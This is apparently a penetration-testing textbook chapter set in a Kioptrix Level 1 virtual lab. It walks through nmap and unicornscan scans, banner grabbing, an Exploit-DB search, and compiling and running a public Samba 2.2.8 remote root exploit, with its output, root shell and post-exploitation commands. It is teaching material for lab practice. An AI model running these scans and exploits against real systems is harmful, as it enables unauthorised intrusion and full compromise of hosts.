Manual exploitation

At this point, we should have two systems ready to go in our virtual environment:

  • Our Kioptrix Level 1 machine, which will be our target
  • Our Kali machine, which will be taking on the role of an attacker

Before we can start with exploitation, we need to determine our plan of attack. An example of our environment is shown in the following image:

Manual exploitation

Enumerating services

We will begin by locating the machine on our network using Nmap. Open up a new terminal session and type:

nmap -f -n -P0 -v -p- -T4

We instructed Nmap to scan all TCP ports for IPs on 192.168.75.X using fragmented packets. Here is an excerpt of the results:

Scanning [65535 ports]
Discovered open port 139/tcp on
Discovered open port 80/tcp on
Discovered open port 22/tcp on
Discovered open port 443/tcp on
Discovered open port 111/tcp on
Discovered open port 32768/tcp on
Completed SYN Stealth Scan at 10:24, 8.05s elapsed (65535 total ports)
Nmap scan report for
Host is up (0.00017s latency).
Not shown: 65529 closed ports
22/tcpopen  ssh
80/tcpopen  http
111/tcpopen  rpcbind
139/tcpopen  netbios-ssn
443/tcpopen  https
32768/tcpopen  filenet-tms
MAC Address: 08:00:27:21:21:62 (Cadmus Computer Systems)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 256 IP addresses (3 hosts up) scanned in 202.60 seconds
           Raw packets sent: 262797 (11.555MB) | Rcvd: 131203 (5.249MB)

Take a look at the highlighted section. You will notice that our target machine has several open TCP ports – 22, 80, 111, 139, 443, and 32768.

Now we know that the system is up and the results indicate that several services are running, we have many choices. We can use Netcat or another similar program to manually probe these ports to get more information and possibly grab some banners, or we can start by performing a more thorough scan on the target machine in question.

Quick scans with unicornscan

Keep in mind that there are many available options to consider when choosing tools. Unicorn scan is a very fast scanner that can quickly scan the virtual lab for us. If your version of Kali does not have unicornscan installed, use the following command syntax: apt-get install unicornscan before attempting any of the following examples.

The following command will scan all TCP ports (-mT which is the default scan type) on the segment using 500 packets per second (-r500). We instructed the command to provide us with information as it is received with the (-I) option:

# unicornscan -mT -r500 -I

This results in the following:

TCP open  ttl 64
TCP open  ttl 64
TCP open  ttl 64
TCP open  ttl 64
TCP open  ttl 64
TCP open  ttl 64
TCP open  ttl 64
TCP open  ttl 64
TCP open  domain[   53]    from  ttl 64
TCP open  http[   80]    from  ttl 64
TCP open  ssh[   22]    from  ttl 64
TCP open  http[   80]    from  ttl 64
TCP open  sunrpc[  111]    from  ttl 64
TCP open  netbios-ssn[  139]    from  ttl 64
TCP open  https[  443]    from  ttl 64
TCP open  filenet-tms[32768]    from  ttl 64

We can also scan for open UDP ports to complete the picture:

# unicornscan -mU -r500 -I

This results in the following output on this particular virtual network (your scan results will vary based on your current lab setup):

UDP open  ttl 64
UDP open  ttl 64
UDP open  ttl 64
UDP open  ttl 64
UDP open  ttl 64
UDP open  ttl 64
UDP open  domain[   53]    from  ttl 64
UDP open  snmp[  161]    from  ttl 64
UDP open  sunrpc[  111]    from  ttl 64
UDP open  netbios-ns[  137]    from  ttl 64
UDP open  filenet-tms[32768]    from  ttl 64
UDP open  domain[   53]    from ttl 64

Review the highlighted results from the previous output carefully. This information will be used to determine which attacks are performed against the targeted system.

Full scanning with Nmap

Now that we know which system we will be targeting, let's find out what a targeted Nmap scan will provide for us:

# nmap -n -sTUV -pT:22,80,111,139,443,32768,U:111,137,32768

Here, we decided to go with a UDP and TCP scan of our open ports to determine their STATE.

  • We use the -sTUV switch to notify Nmap that we are looking for UDP and TCP and provide software versions.
  • We then specify the range using the -p option followed by the ports we would like to scan. U: designates that the ports are UDP.

Here is the output:

Starting Nmap6.49BETA4( ) at 2015-08-02 11:27 EST
Nmap scan report for
Host is up (0.00089s latency).
22/tcp open  sshOpenSSH 2.9p2 (protocol 1.99)
80/tcp open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tc popen  rpcbind
139/tcp open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open  ssl/http    Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcp open  rpcbind
111/udp open  rpcbind
137/udp open  netbios-ns  Microsoft Windows XP netbios-ssn
32768/udp open  rpcbind
MAC Address: 08:00:27:21:21:62 (Cadmus Computer Systems)
Service Info: Host: KIOPTRIX; OS: Windows

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 14.14 seconds

Now, we have something that we can work with. We know which ports are open and have a good idea of which services are running.


The OS: Windows result indicates that this is a Windows machine, which it clearly is not. It is very important to review all of the data to make these determinations and not rely solely on one result.

If you review the results, you may note that there are many outdated services running on this machine. We will take advantage of this fact and use commonly known exploits to compromise the unit. We may want to manually validate these results. We will try to grab some banners now to see what we are dealing with.

Banner grabbing with Netcat and Ncat

Netcat is a very powerful tool that can be used during the enumeration and exploitation stages and can even be used to transfer files or to create backdoors.

We also compare Netcat to Ncat, which is one of the offerings provided by the Nmap team.

Banner grabbing with Netcat

In order to connect to port 80 on, we can use the following command:

# nc 80

This will connect us to the web server on the Kioptrix machine. We need to invoke a command to receive informational output. Type the following:


Press Enter twice and take a look at the output:

HTTP/1.1 200 OK
Date: Sun, 02 Aug 2015 21:19:49 GMT
Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
Last-Modified: Thu, 06 Sep 2001 03:12:46 GMT
ETag: "8805-b4a-3b96e9ae"
Accept-Ranges: bytes
Content-Length: 2890
Connection: close
Content-Type: text/html

This should look familiar. We already discussed the benefits of HTTP headers; the preceding information indicates that the machine is running Apache 1.3.20, RedHat Linux, using mod_ssl Version 2.8.4 and OpenSSL Version 0.9.6b.


It is good practice to note down any actions taken during your testing. This will assist you in future conversations with clients and also allow you to easily replicate your testing at a later date.

This process can be continued with the other ports as well.

Banner grabbing with Ncat

Ncat can also be used to grab the http banner. This is how you do it:

# ncat 80

Ncat uses the same syntax as Netcat for this connection. Type the following and press Enter twice:

 HEAD / HTTP 1.1

We are presented with the following output:

HTTP/1.1 200 OK
Date: Sun, 02 Aug 2015 21:50:53 GMT
Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
Last-Modified: Thu, 06 Sep 2001 03:12:46 GMT
ETag: "8805-b4a-3b96e9ae"
Accept-Ranges: bytes
Content-Length: 2890
Connection: close
Content-Type: text/html

A quick search for mod_ssl/2.8.4 on the Internet will indicate there are vulnerabilities that we could take advantage of.

Banner grabbing with smbclient

One particularly interesting port that stands out is 139/TCP. With the smbclient tool, we can grab the banner of this server. Let's give it a try:

# smbclient -L -N

This command invokes smbclient and directs it to connect to to then display the server information. The -N switch indicates that we do not have a root password for this connection. This results in the following output:

 Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

  Sharename       Type      Comment
  ---------       ----      -------
cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe srvsvc failed with error ERRnosupport
  IPC$            IPCIPC Service (Samba Server)
  ADMIN$          Disk      IPC Service (Samba Server)
Anonymous login successful
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]

  Server               Comment
  ---------            -------
  KIOPTRIX             Samba Server

  Workgroup            Master
  ---------            -------
  MYGROUP              KIOPTRIX

Note that the Samba version is 2.2.1a. We will use this information to search for any known exploits for this service.

Searching Exploit-DB

At you will be able to find a wealth of information about known vulnerabilities and the proof-of-concept code that validates their effectiveness. Using the proof-of-concept code, which is made available, allows you to determine if your particular software is susceptible to these attacks. Proof-of-concept code also provides a mechanism to understand the underlying principles of individual vulnerabilities, thereby enabling you to ensure that your mitigating controls are functioning properly. The team at Exploit Database spend many hours of their personal time ensuring that the submitted proof-of-concept code actually works as described.


If you are attempting to access this website from within your sandboxed virtual lab, you will need to make sure you have a network adapter set up on your Kali box that allows for this. It is recommended that you do not connect your lab to the Internet in any fashion however. There are several secure methods of transferring files to your guest machine—try them out!

Let's perform a search for vulnerabilities associated with Samba version 2.2.1a.

  1. Go to
  2. Click on Search in the top navigation bar.
  3. Once on the search page, click on Advanced Search and enter samba in the Exploit Content field.
  4. Type 139 in the Port: field.
  5. Click on the SEARCH button.

An example of the results from this is shown in the following image:

Searching Exploit-DB

Exploit-DB at hand

One really awesome aspect of using Kali is that the team automatically includes a local copy of the database as part of the distribution. Enter the searchsploit command followed by the search term:

# searchsploit samba

This results in the following output:

Description                                                                 Path
Samba 2.2.x Remote Root Buffer Overflow Exploit/linux/remote/
Samba 2.2.8 Remote Root Exploit - sambal.c /linux/remote/10.c
Samba 2.2.8 (Bruteforce Method) Remote Root Exploit/linux/remote/55.c
MS Windows XP/2003 Samba Share Resource Exhaustion Exploit                  /windows/dos/
Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit                   /linux/remote/
Sambar FTP Server 6.4 (SIZE) Remote Denial of Service Exploit               /windows/dos/2934.php
GoSamba 1.0.1 (include_path) Multiple RFI Vulnerabilities                   /php/webapps/4575.txt
Samba 3.0.27asend_mailslot() Remote Buffer Overflow PoC                    /linux/dos/4732.c
Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC          /multiple/dos/
Samba (client) receive_smb_raw() Buffer Overflow Vulnerability PoC          /multiple/dos/
Samba < 3.0.20 Remote Heap Overflow Exploit (oldie but goodie)              /linux/remote/7701.txt
Samba 2.2.0 - 2.2.8 trans2open Overflow (OS X)/osX/remote/9924.rb
Samba 2.2.xnttrans Overflow /linux/remote/9936.rb
Samba 3.0.21-3.0.24 LSA trans names Heap Overflow                           /linux/remote/9950.rb
Samba 3.0.10 - 3.3.5 Format String And Security Bypass Vulnerabilities      /multiple/remote/10095.txt
Samba Multiple DoS Vulnerabilities/linux/dos/12588.txt
Samba ""username map script"" Command Execution                             /unix/remote/16320.rb
Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow                                 /linux/remote/16321.rb
Samba lsa_io_trans_names Heap Overflow                                      /solaris/remote/16329.rb
Samba trans2open Overflow (Solaris SPARC)                                   /solaris/sparc/remote/16330.rb
Sambar 6 Search Results Buffer Overflow                                     /windows/remote/16756.rb
Samba lsa_io_trans_names Heap Overflow                                      /linux/remote/16859.rb
Samba chain_reply Memory Corruption (Linux x86)                             /linux/remote/16860.rb
Samba trans2open Overflow (Linux x86)                                       /linux/remote/16861.rb
Samba lsa_io_trans_names Heap Overflow                                      /osX/remote/16875.rb
Samba trans2open Overflow (Mac OS X PPC)                                    /os-x/ppc/remote/16876.rb
Samba trans2open Overflow (*BSD x86)                                        /linux/remote/16880.rb

We will try Samba 2.2.8 Remote Root Exploit - samba1.c located at /linux/remote/10.c. This particular exploit has been coded using the C language and as such must be compiled prior to use.

# cp /usr/share/exploitdb/platforms/linux/remote/10.c /opt/10.c

This command will copy the file to our directory of choice, /opt in this case, making it easier to work with. There may be times when the file will immediately compile; in which case, you can simply move on to the next stage.


Be cautious!

It is critical that you understand the code you are compiling. At this point, we are testing against a confined lab environment, but when it it's time to start performing these tasks in a setting that is connected to the outside world, it is crucial that the code is both clean and from a trusted source. You should understand every stage of the exploit code before you try it against someone else's network. Many agree that the best thing is to create your own shellcode for manual exploitation so that you know exactly what will happen when you run it. Before throwing this type of code at a live production unit, test it out in your own contained virtual environment to fully understand the impact of the code you are running—especially if your exploit of choice includes shellcode.

Compiling the code

Here, we will try to compile 10.c without any modification after reviewing the code. The steps performed here are similar for each type of exploit code that has been written using the C language.

# vim 10.c

Review this code. Scroll through it and see if you can understand what will happen when this code is run.


If you are not familiar with VIM, there are several sites that offer a great review of this complex yet powerful tool. Packt Publishing also has Hacking Vim 7.2 available for purchase if you want to learn much more about it in a concise, practical manner. For now, when you are in VIM, you can use :q to exit back to the shell prompt.

An example of the file open in the VIM tool is shown in the following image:

Compiling the code

Compiling proof-of-concept code

Once the code has been reviewed, try to compile it. Exit out of VIM using the :q command sequence and type the following at the command prompt:

# gcc 10.c -o SambaVuln10

We are invoking the GCC compiler and feeding our 10.c source code file to be processed and its output written to the SambaVuln10 file. If everything works as planned, you will not receive any feedback and the command prompt will be shown.


Some believe that the difficulty of compiling a proof of concept exploit will reduce the number of script kiddies that are out there as they lack the skills to troubleshoot the code.

Some security researchers may even add intentional errors such as typos to discourage script kiddies from putting the proof of concept code to malicious use.

If you have any problems with the compiling, you will need to take a closer look at the code and work out the issues before it will compile properly.

Troubleshooting the code

The types of errors that you may come across include code that has improper commenting, extra characters, invalid formatting, or even invalid code intentionally entered into the code to make it more difficult for someone new to compiling.

Let's take a look at a common problem that seems to occur when using code directly from a repository.

What are all of these ^M characters and why won't they go away?

You may look at your code and realize that you have a few (or many!) unwanted characters such as ^M, and regardless of your efforts, they will just not go away.

You can use VIM to solve this problem for you by opening your offending file in VIM and typing :%s/, pressing Ctrl + V then Ctrl + M, followed by //g, which results in the following.


Then press Enter. This instructs VIM to remove all occurrences of ^M in the entire file (%s). Here is an example of what we will be removing using this command:

What are all of these ^M characters and why won't they go away?

Broken strings – the reunion

At times, the code will be formatted incorrectly. It is important to note that this will make it very difficult for GCC to process. Go through the code and ensure that everything is as it should be. In most cases, all of the C code statements need to be on one line.

Once the code has been reviewed and errors have been corrected, try to compile it again until there are no further errors.

Running the exploit

Hopefully, the previous step was rather painless; cleaning up code that others made available can be a cumbersome process. If the exploit code is compiled properly, we can simply execute it to see what other inputs are expected:

# ./SambaVuln10

The output of this command is as follows:

samba-2.2.8< remote root exploit by eSDee (|be)
Usage: ./SambaVuln10 [-bBcCdfprsStv] [host]

-b <platform>bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step>bruteforce steps (default = 300)
-c <ip address>connectbackip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay>bruteforce/scanmode delay in micro seconds (default = 100000)
-f              force
-p <port>       port to attack (default = 139)
-r <ret>        return address
-s              scan mode (random)
-S <network>    scan mode
-t <type>       presets (0 for a list)
-v              verbose mode

We know several key items about our target machine already, including that it is most likely running Linux and that the IP address is Let's use the scanning mode of the exploit to see if there is anything interesting we missed:

./SambaVuln10 -v -b 0 -S 192.168.75
  Samba-2.2.8 < remote root exploit by eSDee (|be)
  + Scan mode.
  + Verbose mode.
  + [] Samba

We can see that our target machine is found by the proof-of-concept remote root exploit by eSDee. Now, we will move forward and finally exploit the machine.

# ./SambaVuln10 -b 0 -v

We invoke the SambaVuln10 file, let it know that the target system is Linux, and instruct it to display verbose results. The output is as follows:

samba-2.2.8< remote root exploit by eSDee (|be)
+ Verbose mode.
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Using ret: [0xbffffed4]
+ Using ret: [0xbffffda8]
+ Using ret: [0xbffffc7c]
+ Using ret: [0xbffffb50]
+ Worked!
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)

If you are new to pentesting, this output may be a bit confusing. You have just managed to gain root access on the target machine and, at this point, can begin many of the post-exploitation steps that are usually required to get a good foothold in the network. You will notice that some commands do not work and some do.


You can also get a shell using python if it is installed by entering the following:

python -c "import pty; pty.spawn('/bin/sh');"

Try the following:

# ls

Hmm… nothing happens. Maybe you did not actually get root? Let's try something different.

# cd /
# ls

That's more like it! Now you should see a full directory listing of /.


There are many other commands that you can use at this time, and there are tricks of the trade in post-exploitation that we will dedicate an entire chapter to. Before we move on, we will perform one more check to see if there was anything interesting on this machine:

Who are you on this machine anyhow?


What system am I connected to?


Who has logged on to this system and when?

Username         Port     From             Latest
root             pts/0    Mon Oct 12 07:27:46 -0400 2009
bin                                        **Never logged in**
daemon                                     **Never logged in**
adm                                        **Never logged in**
lp                                         **Never logged in**
sync                                       **Never logged in**
shutdown                                   **Never logged in**
halt                                       **Never logged in**
mail                                       **Never logged in**
news                                       **Never logged in**
uucp                                       **Never logged in**
operator                                   **Never logged in**
games                                      **Never logged in**
gopher                                     **Never logged in**
ftp                                        **Never logged in**
nobody                                     **Never logged in**
mailnull                                   **Never logged in**
rpm                                        **Never logged in**
xfs                                        **Never logged in**
rpc                                        **Never logged in**
rpcuser                                    **Never logged in**
nfsnobody                                  **Never logged in**
nscd                                       **Never logged in**
ident                                      **Never logged in**
radvd                                      **Never logged in**
postgres                                   **Never logged in**
apache                                     **Never logged in**
squid                                      **Never logged in**
pcap                                       **Never logged in**
john             pts/0    Sat Sep 26 11:32:02 -0400 2009
harold                                     **Never logged in**

As you probably already know, the fact that an attacker could get root on this machine by running this simple proof of concept code is a major problem. You should recommend that your client update all installed software to the latest version possible to avoid such simple compromises.

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